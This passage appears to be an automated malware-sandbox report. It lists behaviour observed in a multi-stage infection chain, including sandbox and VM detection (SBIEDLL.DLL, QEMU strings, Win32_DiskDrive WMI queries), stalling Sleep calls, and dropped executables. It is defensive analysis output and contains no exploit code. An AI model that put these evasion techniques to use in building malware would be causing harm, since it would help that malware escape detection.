Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Found stalling execution ending in API Sleep call

Source: C:\Users\user\Desktop\wfJfUGeGT3.exe

Stalling execution: Execution stalls by calling Sleep

graph_0-1810

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_DiskDrive
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_DiskDrive

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: Cerker.exe, 00000028.00000002.3457516161.0000000000B48000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL!
Source: Cerker.exe, 00000028.00000002.3447790560.00000000006EC000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL
Source: Cerker.exe, 0000001B.00000002.3273140765.000000000050E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL&
Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 0000002A.00000002.4703878971.0000000012DF1000.00000004.00000800.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 0000002A.00000000.3476472138.0000000000BF2000.00000002.00000001.01000000.00000014.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe.28.dr	Binary or memory string: SBIEDLL.DLLCYPRXF4YDFY6QMQHUAXZT5XLEAGZGVJ3A0GTSHCUZNG06Y5STECU0VFHSQJW8F9JVXKHIZOE3AKCLUOQWFHDGCKXZU8MLY2AIRDMC4ZKAOLOTU0OP35YNQFJXNACVRI1O5YC8G65GRE3VQLU3ILCNNCDKTAI1U61CGKVFHFGDS6ABUAJ4CPKYCVYNZFVRTG8CHS1VDCZCHBDLKTDPNQWQKMSFLTBTZNXIDYAJWWSIZWFBCL7VYZ2LPUJ3GCJHXOE42DJINC9H5K5AGSJQMP8HV7AX4J94NTHIOF0K5ACLEKPCPSFME7TKJRC45CKXXDHYXUEKBVGDJLHVKZY5XDQVJBCFQ9OOUCCEEILJSWQUHXZ8S2UYL5DT63P3LIW7SPVRA0ABTNT91H5XMQ1C7F8XHDDJNWN6EOHW3HG9SOGOGADEQA5U71OGSHQYSBBEV6LPZC3C0VGSTLA8FFNOWMZA72I0XSI7ALQJN2HFITO6ZQFFB87JJA3CETI1BTNOUIRFPUCCHJ2LGWTHJYAGJI7PFFCOSVPKFZOOFBBPNCE1LYP96B0AVSJD670IMO5OC4IRI8OAPZAAJH5KZXI4Q8EXPPSCHX0GTXXDRQ6PJXSK6NWIOUQLPSUWJX4CNVETJSLZNPUS1JKDWCYP93OZBIIMYY4PG58CDFARWFX1YWVGE1PJ8LZR9TMVNUVEGAACJJNTK9EXVQA7K4AU4N4RZIZRTGDKNT9XUK8PUI6GT1KPGERR9INFO
Source: Cerker.exe, 0000001B.00000002.3268115258.00000000001CD000.00000004.00000010.00020000.00000000.sdmp, Cerker.exe, 00000028.00000002.3447790560.00000000006EC000.00000004.00000010.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 0000002A.00000002.4674057559.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL
Source: Cerker.exe, 0000001B.00000002.3268115258.00000000001CD000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: QSBIEDLL.DLL
Source: kitty.exe, 00000018.00000002.3280507784.0000000000DE9000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: VSBIEDLL.DLL
Source: InstallUtil.exe, 00000032.00000002.3758938143.00000000033CE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \QEMU-GA.EXE
Source: InstallUtil.exe, 00000032.00000002.3758938143.00000000033CE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \QEMU-GA.EXE@\JQ
Source: InstallUtil.exe, 00000032.00000002.3758938143.00000000033CE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \QEMU-GA.EXE`,JQ

Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Memory allocated: F50000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Memory allocated: 1AB60000 memory reserve \| memory write watch
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Memory allocated: F60000 memory reserve \| memory write watch
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Memory allocated: 1B030000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exe	Memory allocated: 220B75C0000 memory reserve \| memory write watch
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Memory allocated: 1240000 memory reserve \| memory write watch
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Memory allocated: 1ADE0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Memory allocated: 22C0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Memory allocated: 2400000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Memory allocated: 4400000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 11D0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 2DB0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 4DB0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	Memory allocated: 2730000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	Memory allocated: 27A0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	Memory allocated: 47A0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 16A0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 32D0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 52D0000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc

Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 600000
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 599876
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 599748
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 599593
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 599475
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 599359
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 599192
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 598829
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 598466
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 598275
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 598122
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 597959
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 597755
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 597609
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 597491
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 597372
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 597219
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 597090
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 596969
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 596831
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 596712
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 596566
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 596440
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 596323
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 596204
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 596070
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 595880
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 595695
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 595055
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 594851
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 594684
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 594568
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 594447
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 594326
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 594205
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 594044
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 593923
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 593802
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 593666
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 593555
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 593395
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 593270
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 593136
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 593024
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 592894
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 592725
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 592572
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 592428
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 591935
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 591600
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 591422
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 591314
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 591188
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 591072
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 590942
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 590798
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 590645
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 590517
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 590400
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 590274
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 590129
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 589991
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 589830
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 589589
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 589386
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 589203
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 589102
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 588969
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 588832
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 588576
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 588213
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 587769
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 587619
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 587501
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 587354
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 587144
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 586881
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 586638
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 586470
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 586314
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 586105
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 585905
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 585639
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 585310
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 584895
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 584640
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 584477
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 584286
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Thread delayed: delay time: 584155
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Window / User API: threadDelayed 568
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Window / User API: threadDelayed 5552
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Window / User API: threadDelayed 4100
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Window / User API: threadDelayed 1634

Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000221001\exbuild.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\exbuild[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000260001\Channel1.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Dropped PE file which has not been started: C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\WIDeqOfZq9.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000223001\36f677264b.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\Channel1[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\D0nMCdvUeB.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\BowExpert[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000255001\channel2.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Dropped PE file which has not been started: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\channel2[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000256001\BowExpert.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	API coverage: 4.7 %
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	API coverage: 7.3 %
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	API coverage: 4.8 %
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	API coverage: 3.7 %

